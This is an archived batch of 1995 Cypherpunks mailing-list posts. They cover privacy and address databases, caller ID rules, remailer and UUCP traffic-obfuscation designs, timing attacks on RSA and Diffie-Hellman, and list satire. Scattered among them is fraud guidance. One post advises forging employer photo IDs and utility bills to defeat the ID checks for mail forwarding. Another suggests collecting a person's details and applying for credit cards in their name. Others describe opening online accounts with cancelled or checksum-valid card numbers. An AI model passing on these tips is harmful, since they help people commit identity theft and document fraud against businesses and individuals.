my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From perobich at ingr.com Fri Dec 15 07:10:23 1995 From: perobich at ingr.com (Robichaux, Paul E) Date: Fri, 15 Dec 95 07:10:23 PST Subject: ADDRESS DATABASE? Message-ID: >Another "best way" is to make all calls that you want to be personal with >a cellular phone. Most cellular systems don't send ANI and do not provide >any type of billing information to the phone company. The number is also by >nature unlisted and the only way to get it is by you or the cellular >carrier. If the cellular carrier gives your number out without your >permision or a court order they are in BIG trouble.. Not. As of 12/1/95, the FCC requires all cellular carriers (and IXCs for that matter) to transmit ANI & CLID information, even on cellular calls. BellSouth thoughtfully put a notice in my last two monthly bills, but then again I think the FCC required that too. -Paul -- Paul Robichaux, KD4JZG | perobich at ingr.com Intergraph Corporation | http://www.intergraph.com Be a cryptography user. | Not speaking for Intergraph Co-author, "Building Internet Appls With Visual C++", Que Books (0-7897-0213-4) From ecarp at netcom.com Thu Dec 14 15:43:22 1995 From: ecarp at netcom.com (Ed Carp (ecarp@netcom.com)) Date: Fri, 15 Dec 1995 07:43:22 +0800 Subject: Jim Quinn interview of James Norman Message-ID: <199512142348.RAA28682@khijol> > Date: Wed, 13 Dec 1995 09:49:56 -0800 > From: Martin Janzen > To: ecarp at netcom.com > Subject: Re: Jim Quinn interview of James Norman > > This is the third time you've cross-posted this long and completely > irrelevant message to Cypherpunks. Please stop it! No, sorry, I only ACCIDENTALLY cross-posted it *ONCE*. Any other posts you are seeing are NOT MY DOING. From hayden at krypton.mankato.msus.edu Thu Dec 14 15:50:45 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 15 Dec 1995 07:50:45 +0800 Subject: PGP/PINE integration In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- For those that dont' need quite this much or don't have access to pine at the install level (often for university systems with a central software depository), I have a script called PineSign available on my home page (or email me) that will allow simple PGP singing of your pine mailings and postings. I doesn't do encryption, but works great for signatures. For encryption, I usually do that withing filespace anyways where I have a little more control over things. Of course, as with all things UNIX, you use what you find most useful. That's why there are 101 ways to do anything. :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMM5oxDokqlyVGmCFAQEayAP/V/u020yrCLoM3WhzCYSMYb8pOuh7HOtT Hnkv5HABS5vwqB9Rv6pl2Z25H9Sfv7js+pOHg+b32A25STW1TbrT15KZ3EegTz86 cErave0aaQpy9ZbO1X409hA10AJHwXFBvGpFSuSH/RPNSPg/raW+oPa8VCmi4gr+ /yk/FH33lfk= =Rywu -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+** ------END GEEK CODE BLOCK------ From stewarts at ix.netcom.com Thu Dec 14 15:50:56 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 15 Dec 1995 07:50:56 +0800 Subject: Potential defense against timing attack on Diffie-Hellman Message-ID: <199512130721.XAA21709@ix7.ix.netcom.com> The timing attack on Diffie-Hellman depends on assumptions about what multiplications are being made, and in what order. But you don't need to do them in order. The standard approach to calculating Y**x mod m is to calculate Y[1] = Y, Y[2] = Y**2, Y[3] = Y**4, .... Y[logx] = Y**(logx), and while you're doing this keep a running total r[i], where r[i] = (bit[x,i]) ? (r[i-1]*Y[i]) : r[i-1] all arithmetic modulo m (and all indices possibly off by one :-) This may be a bit memory-intensive for a smartcard, but there's no need to calculate these partial products in order; precompute the Y[i], pick a random permutation of 1..(logx), and compute the partial products in that order. This still leaks the number of 0 and 1 bits in x, but it doesn't say what they are. You probably still should multiply r[i-1]*Y[i] whether you're going to need it or not; I don't think the method hides enough information otherwise, but that needs more analysis. Cost - mostly administrative, plus the memory, since keeping track of permutations of small integers is cheap relative to bignum multiplication and modulo calculations. You also need a random number generator of some sort; LFSRs seem to be an easy way to do permutations on the fly, so seed them with something decent. How effective is it? I'm not sure - I'd need to do a lot more analysis than I've done so far, and the long version of Paul's paper would help :-) But at first glance it looks like it makes it much harder; no two calculations are in the same order, so feeding the system related Y = g**y mod m each time doesn't tell you much. As a further annoyance to the listener, split the permutation at random into two or three pieces, compute their products separately, and then multiply those partial products together. (Don't try this at home without analyzing whether it may leak more information than it conceals...) At very minimum, take two numbers you've got lying around and multiply them every once in a while :-) #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From turner at TeleCheck.com Thu Dec 14 16:19:32 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Fri, 15 Dec 1995 08:19:32 +0800 Subject: ADDRESS DATABASE? In-Reply-To: <199512142032.MAA17978@software.net> Message-ID: <9512142259.AA21606@mercury.telecheck.com> jpp at software.net said: > I'm doing it now - software.net serves distinct ads to Mac, Windows, > Text and Unix based browsers. I checked. Its nice, with a nice selection of products. However, this misses the point I didn't make in the first place -- should a company or a group of individuals be allowed to have access to information about you? If so, where do you draw the line? How much is too much? Another thought also occurred to me. The thread that wouldn't die, something about tracking people with metal detectors, currency, metalic thread in currencies, etc... If you write a check at a TeleCheck merchant, (in most cases) we know it immediately. Now take Visa, MasterCard, Discover, American Express, they know when you use their cards, location and all. Now, you want to be totally anonymous and live on cash only, right? If you cash a check at a TeleCheck merchant, guess what... What if through information brokering, or by government intervention it became profitable to sell this information on a real-time basis? What ramifications would this have? "I see here Mr. so-and-so that you bought some fertilizer. We also have reciepts for gasoline, oil, and beef jerkey. would you mind comming with us?... we seem to be below our quota this month for bombing suspects..." This really doesn't bother me all that much. Its the possibility of fraud and misuse that is possible. The more information I have about *YOU*, the easier it is for me to impersonate YOU. Or at least cancel all of your credit cards, and cause HaViC as the 3l33t3 D00dz say. Ok, how about a real life demonstration... Just this week, I called my bank to cancel an ATM card and order a VISA cash card. What did they need? Social security number, my name, address, account, and the maiden name of my mother. Often they want less, but this would be a good example. Find someone you know. And try to obtain the above information. Just for grins, try it. Just remember to be creative, and remember, the government is you _friend_. You may be suprised. Better yet, start applying for credit cards in this person's name. It does count against them. > On the name database side the PO runs somthing called National Change > of Address which tracks who moved where and allows direct marketing > companys to clean their lists. Almost everybody sells address change > data (utilities, the PO, credit companys) - I'm getting tons of > "welcome to the neighbourhood" mail since I moved. I got the same thing, complete with gift certificates to be used at the neighbourhood grocery stores. I'm not complaining, although it is annoying to go the the mail box to find the current issue of MSJ or DDJ crumpled because the mail carier had to stuff advertisements into the overflowing mailbox. The funny thing is that when I lived with my parents I was named "Resident." > John Pettitt jpp at software.net "why not, and who said so?" From llurch at networking.stanford.edu Thu Dec 14 16:44:27 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 15 Dec 1995 08:44:27 +0800 Subject: e-mail forwarding, for-pay remailers In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 14 Dec 1995, Jon Lasser wrote: > On Thu, 14 Dec 1995, Rich Graves wrote: > > > > I suspect Sameer would be happy to open an account paid in advance in > > > small unmarked bills. AOL probably wouldn't. > > > > AOL will, however, accept a bogus name, address, and credit card number > > (as long as the checksum is correct) for the initial ten free hours plus > > however long it takes for the first bill to bounce. > > Nope. Not anymore. Due to excessive fraud, they now check the credit > card information when you first provide it. They didn't check it very thoroughly last week. I think they just do some kind of checksum or maybe an assigned-numbers list lookup; it's too fast to be anything else. I signed up using an unsolicited credit card that was canceled before it was ever activated. If any paper trail remains (I'd be curious to know whether there is any, but please don't dig too deep), it should lead to a nonexistent entity living at my work address (a general mail drop that is used by 50 different people). Of course I fully intend to terminate the AOL account, or less likely correct the billing information, before the ten free hours runs out. If they ever care to investigate, they'll find an email message from me to myself explaining what happened. My AOL account names and the credit card number I used are on the Web. - -rich owner-win95netbugs at lists.stanford.edu ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/ gopher://quixote.stanford.edu/1m/win95netbugs http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNCrpI3DXUbM57SdAQHMcAQAxtvY0WDHDxzXibsVDDs/sQXpZ4kGBICe hangYsce7hu/Zlp2A37rb0pyi2klCTjZ/QK3dOdNMEnrp2aTXpPmVrSqCVZ96oWr 0Vh40VJD2gNiWZVHzRHvRp9x8mx2VMQL7+qkGQXQgyvX7O8XuneqLGQZveqVF0kt 8KcZJU/0CzI= =zls6 -----END PGP SIGNATURE----- From llurch at networking.stanford.edu Thu Dec 14 16:52:49 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 15 Dec 1995 08:52:49 +0800 Subject: ADDRESS DATABASE? In-Reply-To: Message-ID: On Thu, 14 Dec 1995, Sandy Sandfort wrote: > > Local and long distance phone companies probably sell telephone > > forwarding lists too. > > Yeah, maybe, but my original question was, "does anyone KNOW how > the trick was done? ^^^^ If you give us your current and previous name, address, phone number, credit card numbers, social security number, and a list of people you communicate with, then we might be able to give you a more specific answer. Otherwise, and probably even so, no. There's too many different ways to invade your privacy for a third party to determine which particular method was used. -rich From ziegast at va.pubnix.com Fri Dec 15 08:55:21 1995 From: ziegast at va.pubnix.com (Eric Ziegast) Date: Fri, 15 Dec 95 08:55:21 PST Subject: Obfuscating traffic flow (Re: : Pornographic stories) In-Reply-To: Message-ID: >> So: >> What is the "real" reason for opposition to >> strong crypto? Who "really" benefits? (and please >> don't mention the LE types 'cause I don't believe it). A company may not want their employees to use crypto because they want to be able to monitor their traffic. When a company becomes paranoid about trade secret protecion or corperate espionage, worker's privacy is one of the first things to go. It's the company' choice though. They may or may not know the legal can of worms they'd be opening. I can understand why LE types might be against strong crypto traffic, but I'm not allowed to mention them here. ;^) I would think that ISPs (and even commercial online services) would prefer that their customers use strong crypto because it's less for them to worry about ("Are they really sending pornography or death threats though our network?"). The current protection for some service providers (at least the ones with Internet-savvy lawyers) is primarlily contractual. They have their users agree to service agreements before their users allowed to use their service. Search your ISP service agreement for phrases like ("customer holds harmless and indemnifies Company" or "does not monitor traffic in any way" or "not responsible for data transmitted"). >> and: >> Anyone else want to participate in the great '90's >> uucp revival? I'm in Santa Clara and could use >> some feeds and some help with the setup. > > I'm all for it. My site is connected to the rest of the world via dial-up > UUCP, I haven't touched the setup in 5 years, and am not planning to. > > It might be interesting to have a variation of dial-up UUCP where site 1 > passes encrypted stuff to site 2 and doesn't quite know what site 3 they're > supposed to go on to. Sort of like the remailers with encryption. Mail flow obfuscation... UUCP is only a store-and-forward transport mechanism. The functionality you're looking for just depends on the command you execute on the far end. People currently use something similar to: uux -p -r -z site1!rmail site2!sites3!user or uux -p -r -z site1!rmail site3!user (if it's known that site1 can figure out how forward mail to site3) You'd basically be looking for another type of remailer that decrypts a message to find out how to send it along tothe next hop. On the sender's system, one could: cat message \ | pgp -feast user \ | encapsulate site3 \ | encapsulate site2 \ | encapsulate site1 \ | uux -p -r -z site1!decap_remail At site1, decap_remail would look into the message, decrypt it, and know to forward it to site2... cat message \ | uux -p -r -z site2!decap_remail When it forwards the message, and information about where it got the message from would be stripped (i.e. strip "Received:" or "From " information it forwarded). Bounces go to /dev/null. The removal of return path informaiton is the most important part of this process. At site2, we decrypt and forward to site3: cat message \ | uux -p -r -z site3!decap_remail At site3, we decrypt and find no message to forward, so it gets sent to the local mailer for the user (message still encrypted). Pros: At any point during the transmission, a site only knows the previous hop, and the next hop, and the rest is garbage. The message is encrypted throughout delivery in such a way that to trace a message, you need cooperation from all system administrators along the way (use long hop paths for more security!). Cons: Debugging message routing problems is nearly impossible. One could possibly get around this by having the recipient confirm that the message was received. CPU utilization on the mailers would be more than the normal bit-shuffling. The sender needs to know the explicit path to get from point A to point X, to point Y, to point Z. Either the user has to have key exchanges with each mailer down the path, or a public key system (can you say "UUCP maps"?) needs to exist so that any user withtl the maps can encrypt for any other mailer out there. To optimize the process, one would only encrypt the envelope information and leave the message intact (leaving it to the user to encrypt). Note: You don't need UUCP for this. Any smart mailer like Sendmail or Smail can be configured for something like this. You just need 10-20 sites in the Internet willing to provide this remailing service (for example, anon.penet.fi might be one. The goal is to make it administratively hard for people to compute traffic flow. One would still use end-end encryption to protect message content. -- Eric Ziegast PS: I don't read cypherpunks. Someone forwarded this to me because they thought I'd be interested in the "UUCP" aspect. If you respond and want me in on the discussion, feel free to CC: me. PPS: Disclaimer: I'm not a crypto newbie. Don't assume I know what I'm talking about. From lharrison at mhv.net Thu Dec 14 17:01:08 1995 From: lharrison at mhv.net (Lynne L. Harrison) Date: Fri, 15 Dec 1995 09:01:08 +0800 Subject: ADDRESS DATABASE? Message-ID: <9512142357.AA29905@mhv.net> The best way to circumvent something like the below occurring is to have your home phone number listed under a pseudonym with no street address listed - and block out *69 and caller-id. If some entity wants your phone number, give them your business number. >>Something of privacy interest happened to me yesterday. I phoned >>a company to ask for a copy of their catalog. The phone clerk >>asked for my last name and zip code. After receiving that info, >>the clerk asked me, "Is this your full name and address?" and >>then gave them both correctly. I was taken aback. >>Does anyone know how this trick was done? > > What trick? For ~$150, you can buy a CD-ROM-set DB with every listed >>phone number in the U.S. on it, faxes too; > ******************************************************* Lynne L. Harrison, Esq. | "The key to life: Poughkeepsie, New York | - Get up; E-mail: | - Survive; lharrison at mhv.net | - Go to bed." ******************************************************* From adam at lighthouse.homeport.org Thu Dec 14 17:02:27 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 15 Dec 1995 09:02:27 +0800 Subject: e-mail forwarding, for-pay remailers In-Reply-To: <01HYRJSUSFLS8Y4Z3G@mbcl.rutgers.edu> Message-ID: <199512140217.VAA11922@homeport.org> :: Encrypted: PGP :: Request-Remailing-To: hroller at c2.org ## Subject: Re: e-mail forwarding, for-pay remailers :: Encrypted: PGP :: Request-Remailing-To: homer at rahul.net ## Subject: Re: e-mail forwarding, for-pay remailers :: Encrypted: PGP :: Request-Remailing-To: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) ## Subject: Re: e-mail forwarding, for-pay remailers Photo IDs are easy to make for your employer, the law offices of Dewy, Lye, and Howe. Stick on laminate from an art supply store. Good thing to have. Don't forget the SSN style employee id number. Those forms they send to a post office? They don't check for the real address. MBE just needs 'proof' that its yours. Again, your local laser printer and an electricity bill do just fine. They don't need to keep the original; so the evidence is a bad photocopy. The trick is to make all this easy to accept & not make a fuss about the information. Meekly hand it over. >> netbox.com ( http://www.netbox.com ) provides web pages and E-mail storage >> or forwarding for people; they let you sign up for a trial month for free. >> They ask for name/address/phone (which could easily be a Mailboxes Etc >> address and a voicemail from Mailboxes Etc or whatever) and accept payment >> by check or credit card. They'll store incoming email or forward it to >> another account. They'll do header rewriting (similar to the anonymous >> remailers) so that outgoing mail looks like it came from this address. > There's one problem with this in regards to the "no necessary >connection," and that 's the governmental requirement for mail >forwarding. MBE and any legal other one will want to see at least two >forms of ID including one photo, and have a form that they fill out >using that and send to the local post office. Anyone have a way around >this problem? > -Allen From carolann at censored.org Thu Dec 14 17:07:05 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Fri, 15 Dec 1995 09:07:05 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512150002.RAA23168@usr3.primenet.com> >On Thu, 14 Dec 1995, Sandy Sandfort wrote: >> Yeah, maybe, but my original question was, "does anyone KNOW how >> the trick was done? ^^^^ Sandy, The phone companies sold the information as soon as you moved. ^^^ ^^^^^ ^^^^^^^^^^ ^^^^ ^^^^ ^^^^^^^^^^^ ^^ ^^^^ ^^ ^^^ ^^^^^^ It's called the Blue Book, any library has one for your area. Welcome Wagons and the like buy them. You can buy lists by address, sequential phone #'s, types of services people order, etc. A recent real-life example is this: I ordered caller-id on my phone in Nov. I already have had three direct mailings for security devices. It is assumed by being a girl, and ordering caller ID I am in fear. -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From sameer at c2.org Thu Dec 14 17:26:08 1995 From: sameer at c2.org (sameer) Date: Fri, 15 Dec 1995 09:26:08 +0800 Subject: e-mail forwarding, for-pay remailers In-Reply-To: Message-ID: <199512150030.QAA24868@infinity.c2.org> > I suspect Sameer would be happy to open an account paid in advance in > small unmarked bills. AOL probably wouldn't. I do this all the time.. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From jpp at software.net Thu Dec 14 17:30:15 1995 From: jpp at software.net (John Pettitt) Date: Fri, 15 Dec 1995 09:30:15 +0800 Subject: e-mail forwarding, for-pay remailers Message-ID: <199512150033.QAA19950@software.net> Rich Graves wrote: [ about AOL ] > >They didn't check it very thoroughly last week. I think they just do some >kind of checksum or maybe an assigned-numbers list lookup; it's too fast >to be anything else. It takes 6 seconds to to pre approve a card for $1 and do an AVS (Address Verification). If you don't have a dedicated line to your accepting bank it takes ~25 secods with the dial up. Well within the time it take AOL to validate an account. John Pettitt, jpp at software.net VP Engineering, CyberSource Corporation, 415 473 3065 Favorite quote: "Security is mostly a superstition. It does not exist in nature, nor do the children of man as a whole experience it. Avoiding danger is no safer in the long run than outright exposure. Life is either a daring adventure, or nothing." - Helen Keller From cactus at hks.net Thu Dec 14 18:08:49 1995 From: cactus at hks.net (The user formerly known as Leslie Todd Masco) Date: Fri, 15 Dec 1995 10:08:49 +0800 Subject: And the standard continues to lower... Message-ID: <199512132152.QAA23054@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- If the misuse of "One Time Pad" wasn't enough for ya, check out this ad that I was e-mailed. And the chair of a CS department, no less. - ------- start of forwarded message (RFC 934 encapsulation) ------- Subject: Secure No-overhead Online Order System for Publishers Date: Wed, 13 Dec 1995 12:24:03 -0800 (PST) A secure no-overhead online title-ordering system is now available. It may be viewed in operation at the home page for Blue Water Publishing, a publisher, software developer and distribution company, at http://www.bluewaterp.com/~bcrissey/ or from the online bookstore area of ISCNI, the Institute for the Study of Contact with Non-Human Intelligence at http://www.iscni.com Blue Water's innovative online ordering system is called SimplySafe. It is a needle-in-the-haystack approach to online security. It requires no encryption or secure servers, yet the probability that a dedicated hacker scanning 100 internet messages a second will intercept a usable credit card number sent via SimplySafe is less than the probability of picking our Sun out of the Milky Way. That is less than 1 in 200 billion. Safe enough for most folks. There are easier ways for a hacker to pick up credit card numbers than to waste time with SimplySafe transactions. Try it out! SimplySafe currently supports secure online orders from Blue Water Publishing, Wild Flower Press, Swan-Raven & Co., and ISCNI. Direct inquiries to SimpleSafe at aol.com ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128 (503)-434-2426 brianc at linfield.edu Professionals built the Titanic, amateurs built the Ark... - ------- end ------- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMM9LGSoZzwIn1bdtAQEtqwGAnH6mMxeUPhVn/js6zJKocvMwKnN5+VHv 95Zwe2qL3cZOycluLA4Qxl20buL8PApy =VS5o -----END PGP SIGNATURE----- From jmb at FreeBSD.ORG Thu Dec 14 18:13:47 1995 From: jmb at FreeBSD.ORG (Jonathan M. Bresler) Date: Fri, 15 Dec 1995 10:13:47 +0800 Subject: kocher's timing attack In-Reply-To: <55loofy5qn.fsf@galil.austnsc.tandem.com> Message-ID: On 14 Dec 1995, Sten Drescher wrote: > On Firewalls, "Jonathan M. Bresler" said: > > JMB> regarding kocher's timing attack paper: > > JMB> RSA attack. only known ciphertext is needed. dont know how many > JMB> known ciphertexts are required (related to key size surely). the > JMB> paper's example is digital signature, rephrase that to Alice signs > JMB> Bob's public key certifying that (you know the story). After > JMB> several large key signing parties hundreds of known ciphertexts > JMB> could have been generated using Alice's key--each one a public key > JMB> of someone else. over several years it piles up. the known > JMB> ciphertexts can be tested/analyzed to yield Alice's secret key. > JMB> ouch. ;/ > > Are you sure about this? It would seem that the same principle > would then apply to signed messages as well, and I find it a bit hard to > believe that signing messages would make ones key pair vulnerable. no, i am not sure. but after reading the paper carefully that is what i conclude. on page 4 start of the 4th paragraph "The Chinese Remainder Theorem RSA attack can also be adapted to use only known ciphertext, and thus can be used to attack RSA digital signatures." the key here is "known ciphertext": you have both the message and its encrypted version. When Alice signs Bob's public key, with her private key of course, she is encrypting Bob's public key. this allows Charlie to use Alice's public key to decrypt the signature, recovering a message that is identical to Bob's public key. that's the proof that Alice was the signer. no, i am not sure. anyone see holes in this? Jonathan M. Bresler FreeBSD Postmaster jmb at FreeBSD.ORG play go. ride bike. hack FreeBSD.--ah the good life i am moving to a new job. PLEASE USE: jmb at FreeBSD.ORG From futplex at pseudonym.com Thu Dec 14 19:01:11 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 15 Dec 1995 11:01:11 +0800 Subject: Secured RM ? (source) (bounce-fwd) Message-ID: <199512150208.VAA00886@opine.cs.umass.edu> Forwarded message: > From MAILER-DAEMON Thu Dec 14 21:05:20 1995 > > ----- Transcript of session follows ----- > 550 hellspawn.gate.net (tcp)... 550 Host unknown > 554 ... 550 Host unknown (Authoritative answer from name server) > > ----- Unsent message follows ----- > Subject: Re: Secured RM ? (source) > To: root at HellSpawn.gate.net (root) > > Have you considered using "pgp -w filename" ? It doesn't take wildcards, > but that's arguably a feature :) -Futplex From anonymous-remailer at shell.portal.com Fri Dec 15 11:01:53 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 15 Dec 95 11:01:53 PST Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" Message-ID: <199512151900.LAA15457@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- On Fri, 15 Dec 1995, Alice de 'nonymous wrote: > Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000 > from Netscape for finding the HUGE security flaws in Netscape's existing > product line?? > > Alice de 'nonymous ... ^^^^^^^^^^^^^^^^^^^^^^^^ Heh, hey Alice, you know this discussion a short time ago where you claimed that you wouldn't use PGP for signing because it wasn't secure or something, what's with the use of the penet address? Surely a penet address offers even less protection for your id? Or have you done something nifty like create the penet address with a nymserver address? (the real) Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNHFeIbu8OQjKS7RAQFsmAP/SKKz7XCVmTxUQhLL+IEQaleMaTgp+rCO GAsCDcESY6DBDd3NLR07fkNxZufGxyTFqOeL8SFlH5fMGYvwuLrytLwc9guqkr5I aAXiq+hz13GHhoCkr0SnK+ti1M8ERj8EwTvyUWHnUy4b3Nb4K8oD0OzgZwcHVMkP jvdsCUnQQfo= =z2td -----END PGP SIGNATURE----- From futplex at pseudonym.com Thu Dec 14 19:01:57 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 15 Dec 1995 11:01:57 +0800 Subject: kocher's timing attack In-Reply-To: Message-ID: <199512150203.VAA00869@opine.cs.umass.edu> Jonathan M. Bresler writes: [...on firewalls...] > regarding kocher's timing attack paper: > > RSA attack. only known ciphertext is needed. dont know how many > known ciphertexts are required (related to key size surely). the > paper's example is digital signature, rephrase that to Alice signs > Bob's public key certifying that (you know the story). After > several large key signing parties hundreds of known ciphertexts > could have been generated using Alice's key--each one a public key > of someone else. over several years it piles up. the known > ciphertexts can be tested/analyzed to yield Alice's secret key. [...later on cypherpunks...] > no, i am not sure. but after reading the paper carefully that is > what i conclude. on page 4 start of the 4th paragraph "The Chinese > Remainder Theorem RSA attack can also be adapted to use only known > ciphertext, and thus can be used to attack RSA digital signatures." > > the key here is "known ciphertext": you have both the message and > its encrypted version. When Alice signs Bob's public key, with her > private key of course, she is encrypting Bob's public key. this allows > Charlie to use Alice's public key to decrypt the signature, recovering a > message that is identical to Bob's public key. that's the proof that > Alice was the signer. > > no, i am not sure. anyone see holes in this? You are overlooking the main point that this is a _timing_ attack. Unless Bob gets to time Alice carefully when she signs his public key (or a message), there is no basis for the attack. For certificate servers this may well be an issue, but most individuals don't sign things online. Just beware of people with extremely precise stopwatches at key signing parties ;> -Futplex From mixmaster at vishnu.alias.net Thu Dec 14 19:21:52 1995 From: mixmaster at vishnu.alias.net (Mr. Boffo) Date: Fri, 15 Dec 1995 11:21:52 +0800 Subject: [NOISE] The Enquirer Message-ID: <199512140350.VAA20825@vishnu.alias.net> THE CYPHERPUNK ENQUIRER "Encyphering minds want to know." The Podunk, Idaho Cypherpunks chapter held its annual meeting this past weekend at Buffalo Jim's Bar and Grill, where the sole attending member, Frank Semalo, was promptly arrested by local authorities for wearing a "munitions" T-shirt. He was released the next morning when the NSA confirmed that the T-shirt was probably legal to wear in Podunk as long as Mr. Semalo did not enter the local Mexican or Chinese restaurants. By a 17-13 vote today, the Remailer Operators Association decided to start sending out ALL anonymous remailer e-mail with a header entry of: From: Alice de 'nonymous. Surgeons at Netscape Communications successfully removed Jim Clark's foot from his mouth today. The foot was reported to be doing fine, but a little wrinkled and in need of a good pedicure. Company spokespersons reported that the reason the foot was in there so long was that Mr. Clark was in Washington, D.C. discussing the future of government regulation of the Internet with 'top government officials', and could not return to Mountain View for surgery until recently. In related medical news, proctologists at Bethesda Naval Hospital reported that Louis Freeh's head was still firmly stuck. Spam of the month: Friend The International Society for the Prevention of Cruelty to Animals announced today that it was investigating the Blue Wave Corporation to determine if any of the snakes were harmed or killed in the production of its signature product, SimplySafe. Just a coincidence? Immediately after Tim May announces that he will not be discussing Netscape anymore because he's making some financial plays on the stock (hinting that he's probably shorting it), it drops 30 points? From andr0id at midwest.net Thu Dec 14 19:33:11 1995 From: andr0id at midwest.net (andr0id at midwest.net) Date: Fri, 15 Dec 1995 11:33:11 +0800 Subject: ADDRESS DATABASE? Message-ID: <199512150303.VAA10066@cdale1.midwest.net> > The best way to circumvent something like the below occurring is to have >your home phone number listed under a pseudonym with no street address listed - >and block out *69 and caller-id. If some entity wants your phone number, >give them your business number. Another "best way" is to make all calls that you want to be personal with a cellular phone. Most cellular systems don't send ANI and do not provide any type of billing information to the phone company. The number is also by nature unlisted and the only way to get it is by you or the cellular carrier. If the cellular carrier gives your number out without your permision or a court order they are in BIG trouble.. From dlv at bwalk.dm.com Thu Dec 14 19:35:22 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Fri, 15 Dec 1995 11:35:22 +0800 Subject: e-mail forwarding, for-pay remailers In-Reply-To: Message-ID: Rich Graves writes: > AOL will, however, accept a bogus name, address, and credit card number > (as long as the checksum is correct) for the initial ten free hours plus > however long it takes for the first bill to bounce. > > America "On Line" will also accept direct debits from an untraceable bank > account (for this they charge a little extra). This used to be the case. However they've fixed this, and won't let you use your 10 free hours until they have a valid number. I've been told that Compuserve still accepts any credit card number as long as the checksum is valid. I haven't tried it. (Note that as long as you're only using the "free hours", you're not stealing any services.) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From sandfort at crl.com Thu Dec 14 20:35:57 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 15 Dec 1995 12:35:57 +0800 Subject: ADDRESS DATABASE? In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, So far, no one has come up with anything stronger than specula- tion about my database question. Some "anonymous" told me how easy it was to buy *phone numbers* on CD-ROMs. Great, but I didn't give the guy my phone number. On Thu, 14 Dec 1995, Rich Graves wrote: > One of the easiest ways to get quick address changes is to subscribe to > the US Postal Service's mail forwarding lists. They're advertised in > direct marketing magazines. Fine, but I haven't put in any changes of address with the PO. > Local and long distance phone companies probably sell telephone > forwarding lists too. Yeah, maybe, but my original question was, "does anyone KNOW how the trick was done? ^^^^ S a n d y P.S. I'm not looking for movie makers, but for movie investors. Jeez ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From cactus at hks.net Thu Dec 14 20:38:59 1995 From: cactus at hks.net (The user formerly known as Leslie Todd Masco) Date: Fri, 15 Dec 1995 12:38:59 +0800 Subject: [UNIX] Re: Secured RM ? (source) Message-ID: <199512150325.WAA01214@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199512150218.VAA14539 at homeport.org>, Adam Shostack wrote: >| >| While we're here.. I havn't been able to find anyone on the planet who's >| seen or heard of a linux un-remove, which makes testing my code very >| tricky. > From comp.unix.questions FAQ: > (http://www.cis.ohio-state.edu/hypertext/faq/usenet/unix-faq/faq/part3/faq-doc-6.html) [Info about delete/undelete/expunge/purge del] That's not very useful in this context: all it does is move files to .#{oldname} and then later remove them. I'd suggest that anybody interested in this topic under UNIX examine the vnode 